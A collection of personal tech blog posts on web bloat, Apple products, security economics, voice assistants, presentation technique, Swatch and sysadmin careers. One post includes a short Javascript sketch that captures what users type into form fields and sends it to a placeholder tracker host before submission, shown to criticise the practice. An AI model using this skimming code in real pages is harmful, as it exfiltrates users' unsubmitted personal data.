The Enemy Within The Browser

At what point do the downsides of Javascript in the browser exceed the upsides? Have we already passed that point?

If you have any concept of security, the idea of downloading code from the Internet and immediately executing it, sight unseen, on your local machine, should give you the screaming heebie-jeebies. A lot of work has gone into sandboxing the browser processes so that Javascript cannot escape the browser itself, and later, the individual web page that it came from. However, this only dealt with the immediate and obvious vulnerability.

These days, the problem with Javascript is that it is used to track users all over the internet and serve them ads for the same products on every site. Quite why this requires 14 MB and 330 HTTP requests for 537 words is not entirely clear.

Actually, no, it is entirely clear: it is because the copro-grammers ("writers of feces") who produce this stuff have no respect for the users. The same utter disrespect underlies the recent bloat in iOS apps:

One Friday I turned off auto-update for apps and let the update queue build up for a week. The results shocked me.
After the first week I had 7.59GB of updates to install, spread across 67 apps – averaging 113MB per app.

Okay, so maybe you say who cares, you only update apps over wifi - but do you only browse on wifi? 14 MB for a few hundred words - that adds up fast.

And what else is that Javascript up to, beyond wasting bytes - both over the air, and in local storage?

How about snaffling data entered into a form, regardless of whether it has been submitted?

Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.
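
For the avoidance of doubt, this requires no exotic hacking. Here is a minimal sketch of the technique in a few lines of ordinary Javascript - the collection endpoint is hypothetical, but the mechanism is just standard DOM events plus fetch():

    // Hypothetical sketch: capture form fields as they are typed,
    // before the form is ever submitted.
    document.querySelectorAll("input, textarea").forEach((field) => {
      field.addEventListener("input", () => {
        fetch("https://tracker.example.com/collect", {
          method: "POST",
          body: JSON.stringify({
            page: location.href,
            field: field.name,
            value: field.value, // sent even if the user never hits Submit
          }),
        });
      });
    });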

My house, my rules. I look forward to iOS 11, and enabling every blocking feature I can.

I really want media sites to earn money so that they can continue to exist, but they cannot do it at my expense. A banner ad is fine, but 14 MB of Javascript to serve me the same banner ad everywhere - at my expense! - is beyond the pale.

Javascript delenda est.

Thoughts about WWDC '17

First of all, let’s get the elephant in the room out of the way; no new iPhone was announced. I was not necessarily expecting one to show up - that seems more suited to a September event, unless there were specific iOS features that were enabled by new hardware and that developers needed to know about.

We did get a whole ton of new features for iOS 11 (it goes up to eleven!), but many of them were aimed squarely at the iPad. With no new iPhone, the iPad got most of the new product glory, sharing only with the iMac Pro and the HomePod (awful name, by the way).

On that note, some people were confused by the iMac Pro, but Apple has helpfully clarified that there is also going to be a Mac Pro and external displays to go with it:

In addition to the new iMac Pro, Apple is working on a completely redesigned, next-generation Mac Pro architected for pro customers who need the highest-end, high-throughput system in a modular design, as well as a new high-end pro display.

I doubt I will ever buy a desktop Mac again, except possibly if Apple ever updates the Mac mini, so this is all kind of academic for me - although I really hope the dark-coloured wireless extended keyboard from the iMac Pro will also be available for standalone purchase.

What I am really excited about is the new 10.5" iPad Pro and the attendant features in iOS 11¹. The 12.9" is too big for my use case (lots of travel), and the 9.7" Pro always looked like a placeholder device to me. Now we have a full lineup, with the 9.7" non-Pro iPad significantly different from the 10.5" iPad Pro, and the 12.9" iPad Pro there for people who really need the larger size - or maybe just don’t travel with their iPad quite as much as I do.

My current iPad (an Air 2) is my main personal device apart from my iPhone. The MacBook Pro is my work device, and opening it up puts me in "work mode", which is not always a good thing. On the iPad, I do a ton of reading, but I also create a fair amount of content. The on-screen keyboard and various third-party soft-tip styluses (styli?) work fine, but they’re not ideal, and so I have lusted after an iPad Pro for a while now. However, between the lack of sufficient hardware differentiation compared to what I have², and lack of software support for productivity, I never felt compelled to take the plunge.

Now, I can’t wait to get my hands on an iPad Pro 10.5".

I already use features like the sidebar and side-by-side multitasking, but what iOS 11 brings is an order of magnitude beyond - especially with the ability to drag & drop between applications. Right now, while I may build an outline of a document on my iPad, I rarely do the whole thing there, because it is just so painful to do any complex work involving multiple switches between applications - so I end up doing all of that on my Mac.

The problem is that there is friction in working with a Mac; I need (or feel that I need) longer stretches of time and a more work-like environment to pull out my Mac. That friction is completely absent with an iPad; I am perfectly happy to get it out if I have more than a minute or so to myself, and there is plenty of room to work on an iPad in settings (such as, to pick an example at random, an economy seat on a short-haul flight) where there is simply no room to type on a Mac.

The new Files app also looks very promising. Sure, you can sort of do everything it does in a combination of iCloud Drive, Dropbox, and Google Drive, and I do - but I always find myself hunting around for the latest revision, and then turning to the share sheet to get whatever I need to where I can actually work on it.

With iOS 11, it looks like the iPad will truly start delivering on its promise as (all together now) a creation device, not just a consumption device.

Ask me again six months from now…

And if you want more exhaustive analysis, Federico Viticci has you covered.


  1. Yes, there was also some talk about the Watch, but since I gave up on fitness tracking, I can't really see the point in that whole product line. That's not to say that it has no value, just that I don't see the value to me. It certainly seems to be the smartwatch to get if you want to get a smartwatch, but the problem with that proposition is that I don't particularly want any smartwatch. 

  2. To me this is the explanation for the 13 straight quarters of iPad sales drop: an older iPad is still a very capable device, and outside of very specific use cases, or people upgrading from something like an iPad 2 or 3, there hasn’t been a compelling reason to upgrade - yet. For me at least, that compelling reason has arrived, with the combination of 10.5" iPad Pro and iOS 11. After the holiday quarter, I suppose we will find out how many people feel the same way. 

Incentives Drive Behaviour - Security Is No Exception

Why is security so hard?

Since I no longer work in security, I don’t have to worry about looking like an ambulance-chasing sales person, and I can opine freely about the state of the world.

The main problem with security is the intersection of complexity and openness. In the early days of computers there was a philosophical debate about the appropriate level of security to include in system design. The apex of openness was probably MIT’s Incompatible Time-Sharing System, which did not even oblige users to log on - although it was considered polite to do so.

I will just pause here to imagine that ethos of openness in the context of today’s social media, where the situation is so bad that Twitter felt obliged to change its default user icon because the “egg” had become synonymous with bad behaviour online.

By definition, security and openness are always in opposition. Gene "Spaf" Spafford, who knows a thing or two about security, famously opined that:

The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards - and even then I have my doubts.

Obviously, such a highly-secure system is not very usable, so people come up with various compromises based on their personal trade-off between security and usability. The problem is that this attempt to mediate between two opposite impulses adds complexity to the system, which brings its own security vulnerabilities.

Ultimately, IT security is a constant Red Queen’s Race, with operators of IT systems rushing to patch the latest flaws, knowing all the while that more flaws are lurking behind those, or being introduced with new functionality.

Every so often, the maintainers of a system will just throw up their hands, declare it officially unmaintainable, and move on to something else. This process is called "End of Life", and is supposed to coincide with users also moving to the new supported platform.

Unfortunately this mass upgrade does not always take place. Many will cite compatibility as a justification, and certainly any IT technician worth their salt knows better than to mess with a running system without a good reason. More often, though, the reason is cost. In a spreadsheet used to calculate the return on different proposed investments, “security” falls under the heading of “risk avoidance”: a nebulous future event that may become less probable if the investment is made.

For those who have not dealt with many finance people: as a rule, they hate this sort of thing. Unless you have good figures for both the probability of the future event and its impact, they are going to be very unhappy with any proposed investment on that basis.

The result is that old software sticks around long after it should have been retired.

As recently as November 2015, it emerged that Paris’ Orly airport was still operating on Windows 3.1 - an operating system that has not been supported since 2001.

The US military still uses 8" floppy disks for its ICBMs:

"This system remains in use because, in short, it still works," Pentagon spokeswoman Lt Col Valerie Henderson told the AFP news agency.

And of course we are still dealing with the fallout from the recent WannaCry ransomware worm, targeting Windows XP - an operating system that has not been supported since 2014. Despite that, it is still the fourth most popular version of Windows (behind Windows 7, Windows 10, and Windows 8.1), with 5.26% share.

Get to the Point!

It’s easy to mock people still using Windows XP, and to say that they got no more than they deserved - but look at that quote from the Pentagon again:

"This system remains in use because, in short, it still works"

Windows XP still works fine for its users. It is still fit for purpose. The IT industry has failed to give those people a meaningful reason to upgrade - and so many don’t, or wait until they buy new hardware and accept whatever comes with the new machine.

Those upgrades do not come nearly as frequently as they used to, though. In the late Nineties and early Oughts, I upgraded my PC every eighteen months or so (as funds permitted), because every upgrade brought huge, meaningful differences. Windows 95 really was a big step up from Windows 3.1. On the Mac side, System 7 really was much better than System 6. Moving from a 486 to a Pentium, or from 68k to PowerPC, was a massive leap. Adding a 3dfx card to your system made an enormous difference.

Conversely, a three-year-old computer was an unusable pile of junk. Nerds like me installed Linux on them and ran them side by side with our main computers, but most people had no interest in doing such things.

These days, that’s no longer the case. For everyday web browsing, light email, and word processing, a decade-old computer might well still cut it.

That’s not even to mention institutional use of XP; Britain’s NHS, for instance, was hit quite hard by WannaCry due to their use of Windows XP. For large organisations like the NHS, the direct financial cost of upgrading to a newer version of Windows is a relatively small portion of the overall cost of performing the upgrades, ensuring compatibility of all the required software, and retraining literally hundreds of thousands of staff.

So, users have weak incentives to upgrade to new, presumably more secure, versions of software; got it. Should vendors then be obliged to ship them security patches in perpetuity?

Zeynep Tufekci has argued as much in a piece for the New York Times:

First, companies like Microsoft should discard the idea that they can abandon people using older software. The money they made from these customers hasn’t expired; neither has their responsibility to fix defects.

Unfortunately, it’s not that simple, as Steven Bellovin explains:

There are two costs, a development cost $d and an annual support cost $s for n years after the "warranty" period. Obviously, the company pays $d and recoups it by charging for the product. Who should pay $n·s?

The trouble is that n can be large; the support costs could thus be unbounded.

Can we bound n? Two things are very clear. First, in complex software no one will ever find the last bug. As Fred Brooks noted many years ago, in a complex program patches introduce their own, new bugs. Second, achieving a significant improvement in a product's security generally requires a new architecture and a lot of changed code. It's not a patch, it's a new release. In other words, the most secure current version of Windows XP is better known as Windows 10. You cannot patch your way to security.
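
To see why this matters, here is a trivial back-of-the-envelope sketch of Bellovin's cost model - the figures for d and s are invented purely for illustration, since his piece does not supply any:

    // Invented figures: d is the one-off development cost, s the annual
    // post-"warranty" support cost, per Bellovin's model.
    const d = 10000000; // $10M to develop
    const s = 1500000;  // $1.5M per year to keep patching

    for (const n of [1, 5, 10, 20, 50]) {
      console.log(`n = ${n}: support cost $${n * s} vs development cost $${d}`);
    }
    // Nothing bounds n, so the total support cost n·s grows without limit;
    // by n = 50 it is already 7.5 times the entire development budget.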

Incentives matter, on the vendor side as well as on the user side. Microsoft is not incentivised to do further work on Windows XP, because it has already gathered all the revenue it is ever going to get from that product. From a narrowly financial perspective, Microsoft would prefer that everyone purchase a new license for Windows 10, either standalone or bundled with the purchase of new hardware, and migrate to that platform.

Note that, as Steven Bellovin points out above, this is not just price-gouging; there are legitimate technical reasons to want users to move to the latest version of your product. However, financial incentives do matter, a lot.

This is why if you care about security, you should prefer services that come with a subscription.

If you’re not Paying, you’re the Product

Subscription licensing means that users pay a recurring fee, and in return, vendors provide regular updates, including both new features and fixes such as security patches.

As usual, Ben Thompson has a good primer on the difference between one-off and subscription pricing. His point is that subscriptions are better for both users and vendors because they align incentives correctly.

From a vendor’s perspective, one-off purchases give a hit of revenue up front, but do not really incentivise long-term engagement. It is true that in the professional and enterprise software world, there is also an ongoing maintenance charge, typically on the order of 18-20% per year. However, that is generally accounted for differently from sales revenue, and so does not drive behaviour to nearly the same extent. In this model, individual sales people have to behave like sharks, always in motion, always looking for new customers. Support for existing customers is a much lower priority.

Conversely, with a subscription there is a strong incentive for vendors to persuade customers to renew their subscription - including by continuing to provide new features and patches. Subscription renewal rates are scrutinised carefully by management (and investors), as any failure to renew may well be symptomatic of problems.

Users are also incentivised to take advantage of the new features, since they have already paid for them. When upgrades are freely available, they are far more likely to be adopted - compare the adoption rate for new MacOS or iOS versions to the rate for Windows (where upgrades cost money) or Android (where upgrades might not be available, short of purchasing new hardware).

This is why Gartner expects that by 2020, more than 80 percent of software vendors will change their business model from traditional license and maintenance to subscription.

At Work - and at Home, Too

One final point: this is not just an abstract discussion for multi-million-euro enterprise license agreements. The exact same incentives apply at home.

A few years ago, I bought a cordless phone that also communicated with Skype. From the phone handset, I could make or answer either a POTS call or a Skype voice call. This was great - for a while. Unfortunately, the hardware vendor never updated the phone’s drivers for a newer operating system version, to which I had upgraded for various reasons, including improved security.

For a while I soldiered on, using various hacks to keep my Skype phone working, but when the rechargeable batteries died, I threw the whole thing in the recycling bin and got a new, simpler cordless phone that did not depend on complicated software support.

A cordless phone is simple and inexpensive to replace. Imagine that had been my entire Home of the Future IoT setup, with doorbells, locks, alarms, thermostats, fridges, ovens, and who knows what else. “Sorry, your home is no longer supported.”¹

With a subscription, there is a reasonable expectation that vendors will continue to provide support for the reasonable lifetime of their products (and if they don’t, there is a contract with the force of law behind it).

Whether it’s for your home or your business, if you rely on it, make sure that you pay for a subscription, so that you can be assured of support from the vendor.


  1. Smart home support: “Have you tried closing all the windows and then reopening them one by one?”

It Has Come To This

Dear websites that force mobile versions even when I explicitly request the desktop site: please do not hesitate to FOAD. Extra points for losing my context when you do.



Talk Softly

With the advent of always-on devices that are equipped with sensitive microphones and a permanent connection to the Internet, new security concerns are emerging.

Virtual assistants like Apple’s Siri, Microsoft’s Cortana and Google Now have the potential to make enterprise workers more productive. But do “always listening” assistants pose a serious threat to security and privacy, too?

Betteridge’s Law is in effect here. Sure enough, the second paragraph of the article discloses its sources:

Nineteen percent of organizations are already using intelligent digital assistants, such as Siri and Cortana, for work-related tasks, according to Spiceworks’ October 2016 survey of 566 IT professionals in North America, Europe, the Middle East and Africa.

A whole 566 respondents, you say? From a survey run by a help desk software company? One suspects that the article is over-reaching a bit - and indeed, if we click through to the actual survey, we find this:

Intelligent assistants (e.g., Cortana, Siri, Alexa) used for work-related tasks on company-owned devices had the highest usage rate (19%) of AI technologies

That is a little bit different from what the CSO Online article is claiming. Basically, anyone with a company-issued iPhone who has ever used Siri to create an appointment, set a reminder, or send a message about anything work-related would fall into this category.

Instead, the article makes the leap from that limited claim to extrapolating that people will be bringing their Alexa device to work and connecting it to the corporate network. Leaving aside for a moment the particular vision of hell that is an open-plan office where everyone is talking into the air all the time, what does that mean for the specific recommendations in the article?

  1. Focus on user privacy
  2. Develop a policy
  3. Treat virtual assistant devices like any IoT device
  4. Decide on BYO or company-owned
  5. Plan to protect

These are actually not bad recommendations - but they are so generic as to be useless. Worse, when they do get into specifics, they are almost laughably paranoid:

Assume all devices with a microphone are always listening. Even if the device has a button to turn off the microphone, if it has a power source it’s still possible it could be recording audio.

This is drug-dealer-level paranoia. Worrying that Alexa might be broadcasting your super secret and valuable office conversations does not even make the top ten list of concerns companies should have about introducing such devices into their networks.

The most serious threat you can get from Siri at work is co-workers pranking you if you enable access from the lock screen. In that case, anyone can grab your unattended iPhone and instruct Siri to call you by some ridiculous name. Of course I would never sabotage a colleague’s phone by renaming him “Sweet Cakes”. Ahem. Interestingly, it turns out that the hypothetical renaming also extends to the entry in Contacts…

The real concern is that these misguided recommendations take the focus off advice that would actually be useful in the real world. For instance, if you must have IoT devices in the office for some reason, this is good advice:

One way to segment IoT devices from the corporate network is to connect them to a guest Wi-Fi network, which doesn’t provide access to internal network resources.

This recommendation applies to any device that needs Internet access but does not require access to resources on the internal network. This will avoid issues where, by compromising a device (or its enabling cloud service), intruders are able to access your internal network in what is known as a “traversal attack”. If administrators restrict the device’s access to the network, that will also restrict the amount of damage an intruder can do.
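
To make that concrete, on a Linux-based router this segmentation boils down to a couple of firewall rules. A sketch, with hypothetical interface names (a real deployment would use VLANs and a fuller policy):

    # wlan-guest: guest/IoT Wi-Fi; lan0: internal LAN; wan0: Internet uplink.
    # Guest devices may reach the Internet...
    iptables -A FORWARD -i wlan-guest -o wan0 -j ACCEPT
    # ...but any attempt to traverse into the internal network is dropped.
    iptables -A FORWARD -i wlan-guest -o lan0 -j DROP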

Thinking about access to data is a good idea in general, not just for voice assistants or IoT devices:

Since personal virtual assistants “rely on the cloud to comprehend complex commands, fetch data or assign complex computing tasks to more resources,” their use in the enterprise raises issues about data ownership, data retention, data and IP theft, and data privacy enforcement that CISOs and CIOs will need to address.

Any time companies choose to adopt a service that relies on the cloud, their attack surface is not limited to the device itself, but also extends to that back-end service - which is almost certainly outside their visibility and control. Worse, in a BYOD scenario, users may introduce new devices and services to the corporate network that are not designed or configured for compliance with organisations’ security and privacy rules.

Security is important - but let’s focus on getting the basics right, without getting distracted by overly-specific cybersecurity fantasy role-playing game scenarios involving Jason Bourne hacking your Alexa to steal your secrets.

A New Law

I was hanging out on LinkedIn, and I happened to notice a new pop-up, offering to help me boost my professional image with new photo filters.

My professional image may well need all sorts of help, but I do wonder whether this feature was the most productive use of LinkedIn’s R&D time.

Maybe this is the twenty-first century version of Zawinski's Law:

Every social networking app attempts to expand until it has photo filters. Those apps which cannot so expand are replaced by ones which can.

(I did not use the filters.)

New Mac Fever

Apple bloggers are all very excited about the announcement of a new Mac Pro. The best roundup I have seen is on Daring Fireball: The Mac Pro Lives.

I'm not a Mac Pro user, nor frankly am I ever likely to be. My tastes lie more at the other end of the spectrum, with the ultra-portable MacBook (aka MacBook Adorable). However, there was one interesting tidbit for me in the Daring Fireball report:

Near the end, John Paczkowski had the presence of mind to ask about the Mac Mini, which hadn’t been mentioned at all until that point. Schiller: “On that I’ll say the Mac Mini is an important product in our lineup and we weren’t bringing it up because it’s more of a mix of consumer with some pro use. … The Mac Mini remains a product in our lineup, but nothing more to say about it today.”

While there are certainly Mac Mini users who choose it as the cheapest Mac, and perhaps as a way to keep using a monitor and other peripherals that used to be plugged into a PC, there is a substantial contingent of Mac Mini "pro" users. Without getting into Macminicolo levels of pro-ness, I run mine headless in a cupboard, where it serves iTunes and runs a few other services. It's cheap, quiet, and reliable, which makes it ideal for that role. I don't necessarily need ultimate power - average utilisation is extremely low, although there is the odd peak - but I do want to be reassured that this is a product line that will stick around, just in case my current Mac Mini breaks.

The most important Macs are obviously the MacBook and MacBook Pros, but it's good to know that Apple recognises a role for the Mac Pro - and for the Mac Mini.

Let Me Tell You A Story

Any good presentation is a story, and a good presenter is adept at telling it to their audience in a compelling way. Some are naturally good at this sort of thing - but all of us have been forced to sit through presentations with no unifying thread of story.

Luckily for the rest of us, there are techniques that can help us become better storytellers, and avoid boring our audiences to tears.

One of the most effective techniques I have learned is SCIPAB, developed by Steve Mandel and now spread by the company he founded, Mandel Communications. I was lucky enough to be trained in SCIPAB by Mandel Communications as part of a more general "presentation skills" training. I don’t want to steal their thunder (or their business!), but I do want to share some of the insights that I carry with me and use regularly.

SCIPAB is an acronym, which stands for the phases of a story:

  • Situation
  • Complication
  • Implication
  • Proposal¹
  • Action
  • Benefit

These phases have a specific technical meaning within the Mandel technique, but they also align with the phases of another framing device, Joseph Campbell’s Hero’s Journey. There are seventeen phases to the Journey, which Steve Mandel wisely condensed to six for his audience of sales people and marketers. To quote Wikipedia:

In the Departure part of the narrative, the hero or protagonist lives in the ordinary world and receives a call to go on an adventure. The hero is reluctant to follow the call, but is helped by a mentor figure.

The Initiation section begins with the hero then traversing the threshold to the unknown or "special world", where he faces tasks or trials, either alone or with the assistance of helpers.

The hero eventually reaches "the innermost cave" or the central crisis of his adventure, where he must undergo "the ordeal" where he overcomes the main obstacle or enemy, undergoing "apotheosis" and gaining his reward (a treasure or "elixir").

The hero must then return to the ordinary world with his reward. He may be pursued by the guardians of the special world, or he may be reluctant to return, and may be rescued or forced to return by intervention from the outside.

In the Return section, the hero again traverses the threshold between the worlds, returning to the ordinary world with the treasure or elixir he gained, which he may now use for the benefit of his fellow man. The hero himself is transformed by the adventure and gains wisdom or spiritual power over both worlds.

Let us map SCIPAB onto the Hero’s Journey, so that we can take our audiences on a journey with us and lead them to a shared conclusion.

Situation

The S, Situation, is the status quo at the beginning of the story, where our audience is living today. In most heroic stories, this is some kind of idyll, but in most presentations this part serves as an opportunity to confirm our understanding of our audience’s… well, Situation. With a general audience, this is where we level-set, confirming that we all understand the main forces and trends affecting our industry or sector. With a more specific audience, this is our opportunity to confirm our understanding of their specific context, and to trot out all the homework that we have been doing on them. (You have been doing your homework on your audience, right?) If this phase goes well, we have successfully positioned ourselves as the right mentor to lead our audience on the journey.

Complication

The C, Complication, is where we depart from the comfortable status quo. In this section, we are pointing out the trials and tribulations that are the consequence of the Situation. This is where we start to turn up the heat a little and say things that may be uncomfortable for the audience, highlighting ways in which the status quo is problematic or unsatisfactory. This often boils down to “that was a great plan, until these changes occurred, which made it no longer such a good fit”.

Implication

The I, Implication, is the nadir, the lowest point of the emotional journey. Here we describe the ordeal that is inevitable if the Complication is not addressed, the "innermost cave" of the Hero's Journey. This phase is specifically about the bad things that can happen: toil and trouble, with the ultimate possibility of failure in the background. At this point the audience should be deeply uncomfortable, facing unpleasant truths about the long-term consequences of staying on their current trajectory.

Proposal

Having brought the audience to this low point, we give them a vision of what is possible. The P, Proposal, is where we describe a different outcome, the "treasure or elixir" that our audience might win by confronting the monster that we described in the previous steps. Here we are selling a shining vision of a possible future - one that is accessible if only the Situation can be confronted in the right way, avoiding the Complications and their Implications.

This emotional alternation between high and low is very important. In a longer presentation (or blog post or white paper or any other kind of story, for that matter) you can even repeat this alternation multiple times, taking the audience with you on an emotional roller coaster ride. Too much doom & gloom in one dose, and you’ll start to lose them - not just because it makes for a depressing presentation, but also because you end up talking down their current situation. However bad they may intellectually accept things to be, having someone else poke at the sore points over and over (and over) will trigger a negative emotional reaction sooner or later. Don’t call other people’s babies ugly - at least, no more than is strictly necessary!

Action

Because this is ultimately a storytelling methodology in service of a sales effort, the key is to include concrete requests and actions that the audience should take. This is the A of SCIPAB: specific Actions that you want to happen as a consequence of the story you have told. This could be a next-step workshop where you can go deeper into specifics of your Proposal, an opportunity to present to someone higher up the org chart, or a request for the audience to do something, such as download an evaluation version of your tool - but the key to ensuring progress and maintaining momentum is to ask for something at every step.

Benefit

Finally, close on the B, Benefits. This is part of that emotional roller-coaster, and also aligns to the Hero’s Journey. This is where we get concrete with the prospective customer about the "treasure or elixir" they can gain from our Proposal - not to mention the "wisdom or spiritual power" they will gain along the way. This is to the Proposal what the Implication is to the Situation: the consequences that we can reasonably expect, given that starting point.

Above all, don’t be boring

By structuring your communications in this way, you will be able to have much more explicit and productive conversations with prospective customers - and at the very least, you won’t be boring them or inducing Death By Powerpoint.

Plus, this way is much more fun for the presenter. Try it, and let me know how it goes!


  1. This is also known as “Position”, but “Proposal” is what I learned, plus I think it fits better within the flow.

Smart Swatch

Remember Swatch? The must-have colourful plastic watches of the 80s and 90s? They are back in the news, with their new plan to produce their own smartwatch operating system.

Swatch plans to develop its own operating system as the Swiss watchmaker seeks to combine smart technology with the country’s expertise in making timepieces and miniaturisation, chief executive Nick Hayek has said.

Mr Hayek added that he wanted to avoid relying on Apple’s iOS and Google’s Android and provide a “Swiss” alternative offering stronger data protection and ultra-low energy consumption.

This new plan has caused all sorts of consternation around the Internet, but I was disposed to ignore it - until now. I just received this week's Monday Note, by the usually reliable Jean-Louis Gassée.

M. Gassée makes some initially good points about the complexity of operating systems, the immaturity of the smartwatch market, and the short timescales involved. Swatch intends to ship actual products by the end of 2018, which is barely any time at all when it comes to developing and shipping an entirely new physical product at mass-market scale. However, I do wonder whether he is falling into the same trap that he accuses Hayek and Swatch of falling into.

… in 2013, Hayek fils publicly pooh-poohed smart watches:
"Personally, I don’t believe it’s the next revolution… Replacing an iPhone with an interactive terminal on your wrist is difficult. You can’t have an immense display."

I tend to agree with Hayek, as it happens; the "terminal on the wrist" is pretty much a side show. The one stand-out use case for smart watches¹ right now appears to be sensors and fitness. If that's not compelling, then there is very little else to attract you to smartwatches, even if you are a committed technophile like me. For myself, after wearing a Jawbone Up! for a year or two, I determined that I was not making use of the data that were gathered. The activity co-processor in my iPhone is ample for my limited needs.

What Is A Smartwatch?

The key point, however, is that Swatch have not announced an actual smart watch, but rather "an ecosystem for connected objects". M. Gassée even calls out some previous IoT form within CSEM, Swatch's partner in this venture, which recently produced the world's smallest Bluetooth chip.

The case against the wisdom of the Swatch project - the complexity of OS development and maintenance, the need for a developer ecosystem, and so on - assumes that Swatch are contemplating a direct rival for Apple's watchOS and Google's Android Wear. What if that's not what's going on at all?

What if Swatch is going back to its roots, and making something simple and undemanding, but with the potential to be ubiquitous? The ecosystem for a smartwatch is now widespread: everyone has a smartphone, NFC is everywhere, from payment terminals to subway turnstiles. What if Swatch just intends to piggyback on that by embedding a few small and cheap sensors in its watches, without even having a screen at all?

Now that would be a Swatch move. In fact, it's such a Swatch move that they've done it before, with their Snow Pass line:

Its ski watch stores ski pass information and has an antenna that communicates with a scanner at the fast-track ski lift entrance. One swipe of the wrist and you're through.

That description sounds a lot like Apple Pay to me - or really any NFC system. Add some pretty basic sensors, and you've got 80% of the smartwatch functionality that people actually use for 20% of the price.

Seen through this lens, the focus on privacy and security makes sense. It has been said that "the S in IoT stands for 'security'", and we could certainly all use an IoT player that focuses on that missing S. If the sensors themselves are small and simple enough, they would not need frequent updates and patches, as there would be nothing to exploit. The companion smartphone app would be the brains of the operation and gateway to all the data gathered, and could be updated as frequently as necessary, without needing to touch the sensors on the watch.

So What Is Swatch Really Up To?

As to why Swatch would even be interested in entering into such a project, remember that these days Swatch is part of a group that sprawls across 70 different brands, most far more up-scale (albeit less profitable) than lowly Swatch with its plastic watches. Think Omega, Breguet, Glashütte, Longines, or Blancpain. The major threat to those kinds of watches is not any single other watch; most watch lovers own several different mechanical watches, and choose one or another to wear for each day, activity, or occasion. In my own small way, I own three mechanical watches (and two quartz), for instance.

For a while now, and accelerating since the release of the iPhone, the competition for watches was - no watch at all. Why bother to wear a watch, the thinking went, when your smartphone can tell the time much more accurately? But now, insidiously, the competition is a watch again - but it is the last watch its owners will ever wear. Once you start really using an Apple Watch, you don't want to take it off, lest you miss out on all those activities being measured. Circles will go unfilled if you wear your Rolex to dinner.

But what if every watch you buy, at least from The Swatch Group, gives you the same measurements and can maintain continuity through the app on your phone? What if all of your watches can also let you on the subway, pay for your groceries, and so on? Other players such as Breitling and Montblanc have also been looking into this, but I think Swatch has a better chance, if only because they start from scale.

Now we are back to the comfortable (and profitable) status quo ante for the Swiss watch industry, in which watch aficionados own several different watches which they mix and match, but with each one part of the same connected experience.

Analogies are dangerous things. The last few years have conditioned us to watch out for the "PC guys are not just going to figure this out"-type statements from incumbents about to be disrupted. What if this time, the arrow points the other way? What if Swatch has finally figured out a way for the traditional watch industry to fight back against the ugly, unclassy interloper?


  1. In a further sign of the fact that this is still a developing market, even auto-correct appears to get confused between "smartwatch" and "smart watch". 

New Paths to Helicon

I was chatting to a friend last week, and we got onto the topic of where sysadmins come from. "When two sysadmins love each other very much…" - no, that doesn't bear thinking about. BRB, washing out my mind with bleach.

But seriously. There is no certification or degree that makes you a sysadmin. Most people come into the discipline by routes that are circuitous, sideways, if not entirely backwards. The one common factor is that most people scale up to it: they start running a handful of servers, move or grow to a 50-server shop, build out some tools and automation to help them get the job done, then upgrade to 500 servers, and so on.

The question my friend and I had was, what happens when there are no 10- and 50-server shops around? What happens when all the jobs that used to be done with on-premises servers are now done in SaaS or PaaS platforms? My own employer is already like that - we’re over a hundred people, and we are exactly the stereotypical startup that features in big infrastructure vendors' nightmares: a company that owns no physical compute infrastructure, beyond a clutch of stickered-up MacBooks, and runs everything in the cloud.

The 90s and Naughties, when I was cutting my teeth in IT, were a time when there was relative continuity between desktop and enterprise computing, but that is no longer the case. These days you’ve got to be pretty technical as a home user before anything you’re doing will be relevant at enterprise scale, because those in-between cases have mostly gone away. I got my start in IT working at the local Mac shop, but neighbourhood computer stores have gone the way of the dodo. There simply are not many chances to manage physical IT infrastructure any more.

Where Are Today’s On-Ramps?

There is one part of that early experience of mine which remains valid and replicable today. My first task was pure scut-work, transferring physical mail-in warranty cards into the in-house FileMaker Pro "database". After two weeks of this, I demanded (and received) permission to redo the UI, as it was a) making my eyes bleed, and b) frustrating me in my data entry. Once I’d fixed tab order and alignments, I got ambitious and started building out data-queries for auto-suggestions and cross-form validation and all sorts of other weird & wonderful functions to help me with the data entry. Pretty soon, I had just about automated myself out of that job; but in doing so, I had proven my value to the company, and received the traditional reward for a job well done - namely, another job.

That is today’s path into computing. People no longer have to edit autoexec.bat on their home computers just to play games, but on the other hand, they will start to mess around behind the scenes of their gaming forum or chat app, or later on, in Salesforce or ServiceNow or whatever. This is how they will develop an understanding of algorithms, and some of them will go on from there, gradually growing their skills and experience.

A Cloudy Future?

To be clear, this cloud-first world is not yet a reality - even at Moogsoft, only a fairly small percentage of our customer base opts for the SaaS deployment option. More use it for the pilot, though, and interest is picking up, even in unexpected quarters. On the other hand, these are big companies, often with tens or hundreds of thousands of servers. They have sunk costs that mean they lag behind the bleeding edge of the change.

Even if someone does have 50 servers in an in-house server room today, as the hardware reaches its end-of-life date, more and more organisations are opting not to replace them. I was talking to someone who re-does offices, and a big part of the job is ripping out the in-house "data closet" to make more work space. The migration to the cloud is not complete, and won't be for some time, but it has definitely begun, even for existing companies.

What will save human jobs in this brave new world will be "intersection theory" - people finding their niches where different sub-fields and specialisations meet. Intuitive leaps and non-obvious connections between widely separated fields are what humans are good at. Those intersections will be one of the last bastions of human jobs, augmented by automation of the more narrowly-focused and predictable parts of the job.

There will be other hold-outs too, notably tasks that are too niche for it to be worth the compute time to train up a neural network. My own story is somewhere in between the two, and would probably remain a viable on-ramp to IT - assuming, of course, that there are still local firms big enough to need that kind of service.

Constant Change Is The Only Constant

To be clear, this is not me opining from atop an ivory tower. Making those unexpected, non-obvious connections, and doing so in a way that makes sense to humans, is the most precise definition of the job I expect to have twenty years from now that I’d be willing to sign up to.

As we all continue to reinvent ourselves and our worlds, let's not forget to bring the next generations in. Thinking that being irreplaceable is an unalloyed win is a fallacy; if you can't be replaced, you also can't be promoted. We had to make it up as we went along, but now it's time to systematise what we learned along the way and get other people in to help us cover more ground.

See you out there.